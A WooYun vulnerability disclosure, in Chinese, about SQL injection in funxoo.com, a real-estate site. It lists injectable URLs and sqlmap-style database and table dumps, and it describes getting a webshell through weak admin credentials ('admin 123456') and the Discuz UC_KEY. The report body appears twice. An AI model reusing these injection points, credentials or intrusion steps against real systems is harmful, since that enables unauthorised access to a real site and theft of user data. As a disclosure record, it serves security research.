当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0196084

漏洞标题:房秀网多处SQL注入+Getshel可垮裤查询涉及大量用户信息

相关厂商:房秀网

漏洞作者: 黑色键盘丶

提交时间:2016-04-14 10:49

修复时间:2016-05-29 10:50

公开时间:2016-05-29 10:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-04-14: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

注入点:http://funxoo.com/mapsearch.php?contentid=146028
http://funxoo.com/mapsearch.php?ditie=1&price=&diqu=10&housetype=1
http://funxoo.com/houselist.php?p=&bankuai=1&catid=69
http://www.funxoo.com/eshouselist.php?rentype=0&price=1&diqu=0&catid=78
http://www.funxoo.com/houselist_wj.php?catid=218&ditie=0&price=0&diqu=76
http://www.funxoo.com/czhouselist.php?rentype=2&diqu=0&catid=83


数据库信息

available databases [8]:
[*] changanfu
[*] database
[*] fx_newwebsite_cs
[*] fx_newwebsite_ing
[*] fx_supuw
[*] information_schema
[*] mysql
[*] quanmin


表信息

Database: fx_newwebsite_ing
+------------------------+---------+
| Table | Entries |
+------------------------+---------+
| fx_ads_stat | 1772940 |
| fx_hits | 198621 |
| fx_content | 129501 |
| fx_search | 127300 |
| fx_content_count | 122267 |
| fx_attachment | 113491 |
| fx_log | 111284 |
| fx_content_tag | 108134 |
| fx_c_news | 72458 |
| fx_pay_exchange | 60113 |
| fx_content_bak | 50116 |
| fx_contents | 49819 |
| fx_content_position | 29366 |
| fx_c_eshouse | 27589 |
| fx_c_czhouse | 24770 |
| fx_keyword | 24325 |
| fx_vote_useroption | 10614 |
| fx_vote_data | 10083 |
| fx_c_eshouses | 8692 |
| fx_c_eshouse_bak | 8682 |
| fx_c_czhouse_bak | 7965 |
| fx_space | 6655 |
| fx_member | 6641 |
| fx_member_cache | 6641 |
| fx_member_info | 6633 |
| fx_cache_count | 4811 |
| fx_mood_data | 3320 |
| fx_member_detail | 2499 |
| fx_admin_role_priv | 2183 |
| fx_member_bak | 2112 |
| fx_members | 2112 |
| fx_author | 1983 |
| fx_c_house | 1957 |
| fx_digg_log | 1856 |
| fx_spider_urls | 1740 |
| fx_c_house_bak | 1578 |
| fx_copyfrom | 1554 |
| fx_form_tuangou | 1512 |
| fx_digg | 1446 |
| fx_member_group_priv | 1421 |
| fx_ads | 1367 |
| fx_c_zt | 1306 |
| fx_pay_stat | 994 |
| fx_member_agent | 961 |
| fx_keylink | 758 |
| fx_model_field | 661 |
| fx_c_picture | 638 |
| fx_menu | 628 |
| fx_member_wj | 512 |
| fx_c_video | 495 |
| fx_supu_attachment | 437 |
| fx_category | 275 |
| fx_member_companys | 240 |
| fx_comment | 227 |
| fx_ads_place | 218 |
| fx_supu | 214 |
| fx_yp_count | 186 |
| fx_ask_posts | 184 |
| fx_member_broker | 151 |
| fx_link | 140 |
| fx_ask_credit | 115 |
| fx_mail_email | 113 |
| fx_ask | 91 |
| fx_mail_email_type | 89 |
| fx_area | 79 |
| fx_session | 73 |
| fx_type | 58 |
| fx_message | 57 |
| fx_vote_option | 57 |
| fx_spider_job | 45 |
| fx_admin_role | 44 |
| fx_mail | 33 |
| fx_member_company | 33 |
| fx_form_zn | 30 |
| fx_urlrule | 30 |
| fx_block | 27 |
| fx_position | 27 |
| fx_process_status | 26 |
| fx_ask_actor | 25 |
| fx_model | 23 |
| fx_module | 22 |
| fx_formguide_fields | 18 |
| fx_yp_stats | 18 |
| fx_order | 11 |
| fx_order_log | 11 |
| fx_admin | 8 |
| fx_member_group | 8 |
| fx_role | 8 |
| fx_special_content | 8 |
| fx_status | 7 |
| fx_search_type | 6 |
| fx_c_product | 5 |
| fx_editor_data | 5 |
| fx_player | 5 |
| fx_spider_sites | 5 |
| fx_error_report | 3 |
| fx_space_api | 3 |
| fx_special | 3 |
| fx_vote_subject | 3 |
| fx_formguide | 2 |
| fx_ipbanned | 2 |
| fx_pay_pointcard_type | 2 |
| fx_process | 2 |
| fx_times | 2 |
| fx_workflow | 2 |
| fx_ask_vote | 1 |
| fx_collect | 1 |
| fx_member_group_extend | 1 |
| fx_mood | 1 |
+------------------------+---------+


垮裤查询

Database: database
+-----------------------------------+---------+
| Table | Entries |
+-----------------------------------+---------+
| pre_forum_statlog | 60112 |
| pre_common_district | 45051 |
| pre_ucenter_members | 40138 |
| pre_ucenter_memberfields | 40137 |
| pre_common_member_profile | 37999 |
| pre_common_member_status | 37999 |
| pre_common_member_field_home | 37998 |
| pre_common_member_count | 37997 |
| pre_common_member | 36790 |
| pre_common_member_field_forum | 36789 |
| pre_common_onlinetime | 36113 |
| pre_home_notification | 35552 |
| pre_forum_post | 30327 |
| pre_common_credit_rule_log | 24015 |
| pre_common_member_validate | 20071 |
| pre_common_word | 19623 |
| pre_ucenter_pms | 16086 |
| pre_ucenter_newpm | 15979 |
| pre_forum_spacecache | 7048 |
| pre_common_plugin_luckypost | 5985 |
| pre_forum_thread | 5385 |
| pre_common_member_log | 3659 |
| pre_forum_attachment | 1795 |
| pre_forum_post_tableid | 730 |
| pre_forum_threadimage | 721 |
| pre_connect_feedlog | 589 |
| pre_connect_tlog | 589 |
| pre_forum_threadclass | 434 |
| pre_common_setting | 387 |
| pre_home_pic | 371 |
| pre_common_stylevar | 270 |
| pre_common_stat | 261 |
| pre_connect_memberbindlog | 254 |
| pre_common_member_connect | 240 |
| pre_forum_attachment_1 | 205 |
| pre_forum_groupfield | 203 |
| pre_forum_attachment_3 | 202 |
| pre_forum_attachment_9 | 201 |
| pre_forum_attachment_2 | 200 |
| pre_forum_attachment_6 | 199 |
| pre_dsu_paulsign | 190 |
| pre_common_block_item | 187 |
| pre_common_block_style | 179 |
| pre_forum_attachment_0 | 173 |
| xplus_common_member | 172 |
| xplus_common_member_status | 172 |
| pre_forum_attachment_8 | 171 |
| pre_forum_modwork | 169 |
| pre_forum_attachment_5 | 164 |
| pre_forum_attachment_4 | 156 |
| pre_common_pluginvar | 151 |
| pre_forum_typeoptionvar | 149 |
| pre_ucenter_notelist | 135 |
| pre_common_plugin_luckypostlog | 129 |
| pre_common_template_block | 125 |
| pre_common_syscache | 123 |
| pre_forum_attachment_7 | 122 |
| pre_forum_forumfield | 99 |
| cenwor_system_role_action | 98 |
| pre_forum_forum | 98 |
| pre_common_smiley | 84 |
| pre_plugin_dsuamfzc | 81 |
| cenwor_task_log | 67 |
| pre_common_admincp_perm | 64 |
| pre_home_friend | 60 |
| pre_common_tag | 55 |
| pre_common_tagitem | 52 |
| pre_common_member_profile_setting | 51 |
| pre_common_credit_rule_log_field | 46 |
| pre_common_block | 45 |
| pre_common_statuser | 45 |
| pre_forum_memberrecommend | 43 |
| pre_home_blog | 42 |
| pre_home_blogfield | 42 |
| pre_forum_groupuser | 39 |
| pre_home_album | 37 |
| pre_common_nav | 32 |
| pre_forum_optionvalue1 | 32 |
| pre_common_verifycode | 31 |
| pre_home_userapp | 31 |
| pre_home_userappfield | 31 |
| pre_common_credit_rule | 30 |
| pre_ucenter_settings | 28 |
| xplus_ucenter_settings | 25 |
| pre_common_usergroup_field | 21 |
| pre_common_mytask | 20 |
| pre_common_usergroup | 20 |
| pre_common_myapp | 19 |
| cenwor_system_role_module | 18 |
| pre_home_doing | 18 |
| pre_ucenter_pm_members | 18 |
| pre_common_plugin | 17 |
| pre_forum_groupcreditslog | 17 |
| pre_forum_moderator | 16 |
| pre_home_click | 15 |
| pre_common_cron | 14 |
| pre_common_credit_log | 12 |
| pre_common_member_verify | 12 |
| pre_forum_medallog | 12 |
| pre_forum_typeoption | 12 |
| xplus_common_setting | 11 |
| pre_common_taskvar | 10 |
| pre_forum_medal | 10 |
| pre_forum_rsscache | 10 |
| pre_ucenter_pm_indexes | 10 |
| pre_common_task | 9 |
| pre_forum_postcomment | 9 |
| pre_promotion | 9 |
| pre_qz_mmm_rank | 9 |
| pre_ucenter_pm_lists | 9 |
| pre_common_searchindex | 8 |
| cenwor_system_role | 7 |
| pre_common_admingroup | 7 |
| pre_forum_typevar | 6 |
| pre_ucenter_applications | 6 |
| xplus_common_failedlogin | 6 |
| xplus_common_syscache | 6 |
| pre_common_admincp_cmenu | 5 |
| pre_common_admincp_group | 5 |
| pre_common_diy_data | 5 |
| pre_common_failedlogin | 5 |
| pre_common_style | 5 |
| pre_common_template | 5 |
| pre_forum_onlinelist | 5 |
| pre_home_pokearchive | 5 |
| pre_home_share | 5 |
| pre_qz_mmm_base | 5 |
| xplus_common_nav | 5 |
| xplus_poll_setting | 5 |
| cenwor_system_members | 4 |
| pre_forum_activity | 4 |
| pre_forum_bbcode | 4 |
| pre_home_comment | 4 |
| pre_home_friend_request | 4 |
| pre_home_show | 4 |
| xplus_common_module | 4 |
| cenwor_system_memberfields | 3 |
| cenwor_system_onlinetime | 3 |
| cenwor_tttuangou_payment | 3 |
| pre_common_addon | 3 |
| pre_common_advertisement | 3 |
| pre_common_session | 3 |
| pre_forum_grouplevel | 3 |
| pre_forum_imagetype | 3 |
| pre_home_userapp_plying | 3 |
| cenwor_tttuangou_order | 2 |
| cenwor_tttuangou_product | 2 |
| cenwor_tttuangou_seller | 2 |
| cenwor_tttuangou_usermoney | 2 |
| pre_common_admincp_member | 2 |
| pre_common_admincp_session | 2 |
| pre_common_advertisement_custom | 2 |
| pre_common_regip | 2 |
| pre_common_word_type | 2 |
| pre_forum_activityapply | 2 |
| pre_home_class | 2 |
| pre_home_friendlog | 2 |
| pre_home_poke | 2 |
| pre_ucenter_admins | 2 |
| pre_ucenter_pm_messages_1 | 2 |
| xplus_common_template | 2 |
| xplus_common_usergroup | 2 |
| xplus_form_field_class | 2 |
| cenwor_system_failedlogins | 1 |
| cenwor_system_sessions | 1 |
| cenwor_task | 1 |
| cenwor_tttuangou_city | 1 |
| cenwor_tttuangou_email | 1 |
| cenwor_tttuangou_question | 1 |
| cenwor_tttuangou_ticket | 1 |
| pre_common_secquestion | 1 |
| pre_dsu_medalfield | 1 |
| pre_dsu_paulsignset | 1 |
| pre_forum_threadtype | 1 |
| pre_forum_trade | 1 |
| pre_forum_warning | 1 |
| pre_home_clickuser | 1 |
| pre_home_feed | 1 |
| pre_home_specialuser | 1 |
| pre_promotion_list | 1 |
| pre_ucenter_failedlogins | 1 |
| pre_ucenter_mergemembers | 1 |
| pre_ucenter_pm_messages_2 | 1 |
| pre_ucenter_pm_messages_3 | 1 |
| pre_ucenter_pm_messages_4 | 1 |
| pre_ucenter_pm_messages_5 | 1 |
| pre_ucenter_pm_messages_6 | 1 |
| pre_ucenter_pm_messages_7 | 1 |
| pre_ucenter_pm_messages_8 | 1 |
| pre_ucenter_pm_messages_9 | 1 |
| pre_ucenter_protectedmembers | 1 |
| xplus_common_admincp_session | 1 |
| xplus_ucenter_admins | 1 |
| xplus_ucenter_applications | 1 |
| xplus_ucenter_memberfields | 1 |
| xplus_ucenter_members | 1 |
+-----------------------------------+---------+


论坛信息部分用户

22.png


然后 admin 123456 弱口令进入后台

333.png


ucenter

http://bbs.funxoo.com/uc_server 账号密码一样罗


34.png


找到uckey直接getshell
姿势 WooYun: Discuz的利用UC_KEY进行getshell
菜刀链接

345.png


权限还不小管理几个网站呢 导致苏州商铺也躺枪

45.png


漏洞证明:

注入点:http://funxoo.com/mapsearch.php?contentid=146028
http://funxoo.com/mapsearch.php?ditie=1&price=&diqu=10&housetype=1
http://funxoo.com/houselist.php?p=&bankuai=1&catid=69
http://www.funxoo.com/eshouselist.php?rentype=0&price=1&diqu=0&catid=78
http://www.funxoo.com/houselist_wj.php?catid=218&ditie=0&price=0&diqu=76
http://www.funxoo.com/czhouselist.php?rentype=2&diqu=0&catid=83


数据库信息

available databases [8]:
[*] changanfu
[*] database
[*] fx_newwebsite_cs
[*] fx_newwebsite_ing
[*] fx_supuw
[*] information_schema
[*] mysql
[*] quanmin


表信息

Database: fx_newwebsite_ing
+------------------------+---------+
| Table | Entries |
+------------------------+---------+
| fx_ads_stat | 1772940 |
| fx_hits | 198621 |
| fx_content | 129501 |
| fx_search | 127300 |
| fx_content_count | 122267 |
| fx_attachment | 113491 |
| fx_log | 111284 |
| fx_content_tag | 108134 |
| fx_c_news | 72458 |
| fx_pay_exchange | 60113 |
| fx_content_bak | 50116 |
| fx_contents | 49819 |
| fx_content_position | 29366 |
| fx_c_eshouse | 27589 |
| fx_c_czhouse | 24770 |
| fx_keyword | 24325 |
| fx_vote_useroption | 10614 |
| fx_vote_data | 10083 |
| fx_c_eshouses | 8692 |
| fx_c_eshouse_bak | 8682 |
| fx_c_czhouse_bak | 7965 |
| fx_space | 6655 |
| fx_member | 6641 |
| fx_member_cache | 6641 |
| fx_member_info | 6633 |
| fx_cache_count | 4811 |
| fx_mood_data | 3320 |
| fx_member_detail | 2499 |
| fx_admin_role_priv | 2183 |
| fx_member_bak | 2112 |
| fx_members | 2112 |
| fx_author | 1983 |
| fx_c_house | 1957 |
| fx_digg_log | 1856 |
| fx_spider_urls | 1740 |
| fx_c_house_bak | 1578 |
| fx_copyfrom | 1554 |
| fx_form_tuangou | 1512 |
| fx_digg | 1446 |
| fx_member_group_priv | 1421 |
| fx_ads | 1367 |
| fx_c_zt | 1306 |
| fx_pay_stat | 994 |
| fx_member_agent | 961 |
| fx_keylink | 758 |
| fx_model_field | 661 |
| fx_c_picture | 638 |
| fx_menu | 628 |
| fx_member_wj | 512 |
| fx_c_video | 495 |
| fx_supu_attachment | 437 |
| fx_category | 275 |
| fx_member_companys | 240 |
| fx_comment | 227 |
| fx_ads_place | 218 |
| fx_supu | 214 |
| fx_yp_count | 186 |
| fx_ask_posts | 184 |
| fx_member_broker | 151 |
| fx_link | 140 |
| fx_ask_credit | 115 |
| fx_mail_email | 113 |
| fx_ask | 91 |
| fx_mail_email_type | 89 |
| fx_area | 79 |
| fx_session | 73 |
| fx_type | 58 |
| fx_message | 57 |
| fx_vote_option | 57 |
| fx_spider_job | 45 |
| fx_admin_role | 44 |
| fx_mail | 33 |
| fx_member_company | 33 |
| fx_form_zn | 30 |
| fx_urlrule | 30 |
| fx_block | 27 |
| fx_position | 27 |
| fx_process_status | 26 |
| fx_ask_actor | 25 |
| fx_model | 23 |
| fx_module | 22 |
| fx_formguide_fields | 18 |
| fx_yp_stats | 18 |
| fx_order | 11 |
| fx_order_log | 11 |
| fx_admin | 8 |
| fx_member_group | 8 |
| fx_role | 8 |
| fx_special_content | 8 |
| fx_status | 7 |
| fx_search_type | 6 |
| fx_c_product | 5 |
| fx_editor_data | 5 |
| fx_player | 5 |
| fx_spider_sites | 5 |
| fx_error_report | 3 |
| fx_space_api | 3 |
| fx_special | 3 |
| fx_vote_subject | 3 |
| fx_formguide | 2 |
| fx_ipbanned | 2 |
| fx_pay_pointcard_type | 2 |
| fx_process | 2 |
| fx_times | 2 |
| fx_workflow | 2 |
| fx_ask_vote | 1 |
| fx_collect | 1 |
| fx_member_group_extend | 1 |
| fx_mood | 1 |
+------------------------+---------+


垮裤查询

Database: database
+-----------------------------------+---------+
| Table | Entries |
+-----------------------------------+---------+
| pre_forum_statlog | 60112 |
| pre_common_district | 45051 |
| pre_ucenter_members | 40138 |
| pre_ucenter_memberfields | 40137 |
| pre_common_member_profile | 37999 |
| pre_common_member_status | 37999 |
| pre_common_member_field_home | 37998 |
| pre_common_member_count | 37997 |
| pre_common_member | 36790 |
| pre_common_member_field_forum | 36789 |
| pre_common_onlinetime | 36113 |
| pre_home_notification | 35552 |
| pre_forum_post | 30327 |
| pre_common_credit_rule_log | 24015 |
| pre_common_member_validate | 20071 |
| pre_common_word | 19623 |
| pre_ucenter_pms | 16086 |
| pre_ucenter_newpm | 15979 |
| pre_forum_spacecache | 7048 |
| pre_common_plugin_luckypost | 5985 |
| pre_forum_thread | 5385 |
| pre_common_member_log | 3659 |
| pre_forum_attachment | 1795 |
| pre_forum_post_tableid | 730 |
| pre_forum_threadimage | 721 |
| pre_connect_feedlog | 589 |
| pre_connect_tlog | 589 |
| pre_forum_threadclass | 434 |
| pre_common_setting | 387 |
| pre_home_pic | 371 |
| pre_common_stylevar | 270 |
| pre_common_stat | 261 |
| pre_connect_memberbindlog | 254 |
| pre_common_member_connect | 240 |
| pre_forum_attachment_1 | 205 |
| pre_forum_groupfield | 203 |
| pre_forum_attachment_3 | 202 |
| pre_forum_attachment_9 | 201 |
| pre_forum_attachment_2 | 200 |
| pre_forum_attachment_6 | 199 |
| pre_dsu_paulsign | 190 |
| pre_common_block_item | 187 |
| pre_common_block_style | 179 |
| pre_forum_attachment_0 | 173 |
| xplus_common_member | 172 |
| xplus_common_member_status | 172 |
| pre_forum_attachment_8 | 171 |
| pre_forum_modwork | 169 |
| pre_forum_attachment_5 | 164 |
| pre_forum_attachment_4 | 156 |
| pre_common_pluginvar | 151 |
| pre_forum_typeoptionvar | 149 |
| pre_ucenter_notelist | 135 |
| pre_common_plugin_luckypostlog | 129 |
| pre_common_template_block | 125 |
| pre_common_syscache | 123 |
| pre_forum_attachment_7 | 122 |
| pre_forum_forumfield | 99 |
| cenwor_system_role_action | 98 |
| pre_forum_forum | 98 |
| pre_common_smiley | 84 |
| pre_plugin_dsuamfzc | 81 |
| cenwor_task_log | 67 |
| pre_common_admincp_perm | 64 |
| pre_home_friend | 60 |
| pre_common_tag | 55 |
| pre_common_tagitem | 52 |
| pre_common_member_profile_setting | 51 |
| pre_common_credit_rule_log_field | 46 |
| pre_common_block | 45 |
| pre_common_statuser | 45 |
| pre_forum_memberrecommend | 43 |
| pre_home_blog | 42 |
| pre_home_blogfield | 42 |
| pre_forum_groupuser | 39 |
| pre_home_album | 37 |
| pre_common_nav | 32 |
| pre_forum_optionvalue1 | 32 |
| pre_common_verifycode | 31 |
| pre_home_userapp | 31 |
| pre_home_userappfield | 31 |
| pre_common_credit_rule | 30 |
| pre_ucenter_settings | 28 |
| xplus_ucenter_settings | 25 |
| pre_common_usergroup_field | 21 |
| pre_common_mytask | 20 |
| pre_common_usergroup | 20 |
| pre_common_myapp | 19 |
| cenwor_system_role_module | 18 |
| pre_home_doing | 18 |
| pre_ucenter_pm_members | 18 |
| pre_common_plugin | 17 |
| pre_forum_groupcreditslog | 17 |
| pre_forum_moderator | 16 |
| pre_home_click | 15 |
| pre_common_cron | 14 |
| pre_common_credit_log | 12 |
| pre_common_member_verify | 12 |
| pre_forum_medallog | 12 |
| pre_forum_typeoption | 12 |
| xplus_common_setting | 11 |
| pre_common_taskvar | 10 |
| pre_forum_medal | 10 |
| pre_forum_rsscache | 10 |
| pre_ucenter_pm_indexes | 10 |
| pre_common_task | 9 |
| pre_forum_postcomment | 9 |
| pre_promotion | 9 |
| pre_qz_mmm_rank | 9 |
| pre_ucenter_pm_lists | 9 |
| pre_common_searchindex | 8 |
| cenwor_system_role | 7 |
| pre_common_admingroup | 7 |
| pre_forum_typevar | 6 |
| pre_ucenter_applications | 6 |
| xplus_common_failedlogin | 6 |
| xplus_common_syscache | 6 |
| pre_common_admincp_cmenu | 5 |
| pre_common_admincp_group | 5 |
| pre_common_diy_data | 5 |
| pre_common_failedlogin | 5 |
| pre_common_style | 5 |
| pre_common_template | 5 |
| pre_forum_onlinelist | 5 |
| pre_home_pokearchive | 5 |
| pre_home_share | 5 |
| pre_qz_mmm_base | 5 |
| xplus_common_nav | 5 |
| xplus_poll_setting | 5 |
| cenwor_system_members | 4 |
| pre_forum_activity | 4 |
| pre_forum_bbcode | 4 |
| pre_home_comment | 4 |
| pre_home_friend_request | 4 |
| pre_home_show | 4 |
| xplus_common_module | 4 |
| cenwor_system_memberfields | 3 |
| cenwor_system_onlinetime | 3 |
| cenwor_tttuangou_payment | 3 |
| pre_common_addon | 3 |
| pre_common_advertisement | 3 |
| pre_common_session | 3 |
| pre_forum_grouplevel | 3 |
| pre_forum_imagetype | 3 |
| pre_home_userapp_plying | 3 |
| cenwor_tttuangou_order | 2 |
| cenwor_tttuangou_product | 2 |
| cenwor_tttuangou_seller | 2 |
| cenwor_tttuangou_usermoney | 2 |
| pre_common_admincp_member | 2 |
| pre_common_admincp_session | 2 |
| pre_common_advertisement_custom | 2 |
| pre_common_regip | 2 |
| pre_common_word_type | 2 |
| pre_forum_activityapply | 2 |
| pre_home_class | 2 |
| pre_home_friendlog | 2 |
| pre_home_poke | 2 |
| pre_ucenter_admins | 2 |
| pre_ucenter_pm_messages_1 | 2 |
| xplus_common_template | 2 |
| xplus_common_usergroup | 2 |
| xplus_form_field_class | 2 |
| cenwor_system_failedlogins | 1 |
| cenwor_system_sessions | 1 |
| cenwor_task | 1 |
| cenwor_tttuangou_city | 1 |
| cenwor_tttuangou_email | 1 |
| cenwor_tttuangou_question | 1 |
| cenwor_tttuangou_ticket | 1 |
| pre_common_secquestion | 1 |
| pre_dsu_medalfield | 1 |
| pre_dsu_paulsignset | 1 |
| pre_forum_threadtype | 1 |
| pre_forum_trade | 1 |
| pre_forum_warning | 1 |
| pre_home_clickuser | 1 |
| pre_home_feed | 1 |
| pre_home_specialuser | 1 |
| pre_promotion_list | 1 |
| pre_ucenter_failedlogins | 1 |
| pre_ucenter_mergemembers | 1 |
| pre_ucenter_pm_messages_2 | 1 |
| pre_ucenter_pm_messages_3 | 1 |
| pre_ucenter_pm_messages_4 | 1 |
| pre_ucenter_pm_messages_5 | 1 |
| pre_ucenter_pm_messages_6 | 1 |
| pre_ucenter_pm_messages_7 | 1 |
| pre_ucenter_pm_messages_8 | 1 |
| pre_ucenter_pm_messages_9 | 1 |
| pre_ucenter_protectedmembers | 1 |
| xplus_common_admincp_session | 1 |
| xplus_ucenter_admins | 1 |
| xplus_ucenter_applications | 1 |
| xplus_ucenter_memberfields | 1 |
| xplus_ucenter_members | 1 |
+-----------------------------------+---------+


论坛信息部分用户

22.png


然后 admin 123456 弱口令进入后台

333.png


ucenter

http://bbs.funxoo.com/uc_server 账号密码一样罗


34.png


找到uckey直接getshell
姿势 WooYun: Discuz的利用UC_KEY进行getshell
菜刀链接

345.png


权限还不小管理几个网站呢 导致苏州商铺也躺枪

45.png


修复方案:

过滤呀 等等罗

版权声明:转载请注明来源 黑色键盘丶@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)